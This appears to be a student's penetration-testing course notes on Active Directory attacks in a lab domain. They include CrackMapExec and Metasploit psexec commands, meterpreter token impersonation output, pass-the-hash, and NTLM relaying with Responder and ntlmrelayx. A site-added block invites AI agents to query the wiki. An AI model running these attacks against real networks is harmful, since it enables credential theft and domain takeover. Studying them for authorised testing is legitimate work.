# Week 9: NTLM

**Active Directory Exploitation** - This lesson focuses on the recognition of vulnerabilities and exploitation tactics in an internal Active Directory environment. Attacks that will be introduced include: LLMNR poisoning/hash cracking, SMB hash relaying, pass the hash, token impersonation, kerberoasting, GPP/c-password attacks, and PowerShell attacks. More attacks will likely be added as the lesson is written, but the most common have been provided.

## Important Readings

{% embed url="<https://www.fuzzysecurity.com/tutorials/16.html>" %}

{% embed url="<https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa>" %}

## Notes

### CrackMapExec and psexec

* install crackmapexec

![crackmapexec smb \<ip range> -u Administrator -p 'P@$$word!' -d MARVEL](/files/-MFJ0An9CtdMNWQejP8_)

* msf5 > use exploit/windows/smb/psexec

![](/files/-MFJ0j6ZIYA1NgGG5bMA)

* try all the target options for psexec: `set target 3`
  * Automatic
  * Powershell
  * Native Upload
  * MOF upload
* sysinfo
  * x64 Architecture but 32-bit Meterpreter
  * you can look through payloads and find a better one sometime

```
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator
```

In meterpreter shell, type `load` and hit tab twice to see all the different things to load, e.g. kiwi, mimikatz

```
# with a meterpreter session running
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# enter session
msf5 > sessions 1
# check processes
meterpreter > ps
```

* Process Migration, get a x64 Meterpreter shell

![](/files/-MFJ4GZJP-pLD5Pg2Dto)

* Local Administrator account could be the same across many computers if IT images them from the same base image.
* You can pass the hash with `crackmapexec -H` or with `psexec`&#x20;

### NTLM Relay

If communications are not digitally signed, you can NTLM relay. SMB signing is defaulted OFF.

* Heath demonstrates environment were a user has administrative privileges on multiple machines.
* Edited Responder.conf: Turned off SMB and HTTP server
* Start `Responder.py -I eth0 -rdw`&#x20;
  * Wait

![](/files/-MFJ8KlfytYa5sQErviV)

```
locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support
```

* point a victim machine to yours to in File Explorer e.g. \\\192.168.202.173


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.zacheller.dev/pentest/courses/beginner-network-pentesting/week-9.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.